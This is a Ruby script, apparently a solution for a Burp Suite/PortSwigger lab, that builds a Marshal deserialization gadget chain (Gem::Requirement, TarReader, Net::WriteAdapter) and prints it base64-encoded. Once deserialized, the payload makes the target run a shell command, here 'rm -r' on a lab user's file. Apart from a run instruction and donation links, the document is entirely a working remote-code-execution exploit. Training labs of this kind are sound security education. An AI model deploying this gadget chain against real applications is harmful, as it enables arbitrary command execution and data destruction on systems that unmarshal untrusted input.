Burp Suite Community - Exploiting Ruby deserialization using a documented gadget chain
#! /usr/bin/ruby require 'base64' # Autoload the required classes Gem::SpecFetcher Gem::Installer # prevent the payload from running when we Marshal.dump it module Gem class Requirement def marshal_dump [@requirements] end end end wa1 = Net::WriteAdapter.new(Kernel, :system) rs = Gem::RequestSet.allocate rs.instance_variable_set('@sets', wa1) rs.instance_variable_set('@git_set', "rm -r /home/carlos/morale.txt") wa2 = Net::WriteAdapter.new(rs, :resolve) i = Gem::Package::TarReader::Entry.allocate i.instance_variable_set('@read', 0) i.instance_variable_set('@header', "aaa") n = Net::BufferedIO.allocate n.instance_variable_set('@io', i) n.instance_variable_set('@debug_output', wa2) t = Gem::Package::TarReader.allocate t.instance_variable_set('@io', n) r = Gem::Requirement.allocate r.instance_variable_set('@requirements', t) payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) #puts payload.inspect #puts Marshal.load(payload) puts Base64.encode64(payload) ON_LINUX: ------------------ $ sudo ruby {FILE.rb} DONATE: --------------- PAT: https://www.patreon.com/rezatahirkheli PP: https://www.paypal.com/paypalme/rezatahirkheli1 BTC: 3EUQBWZKX9Vcwdffd3cUGATQopxrAQQxJ9 LTC: MBXE6hJgxxFYSD8SjmR7sHCHGTqFXmNGoU GFM: https://gofund.me/7d6500bd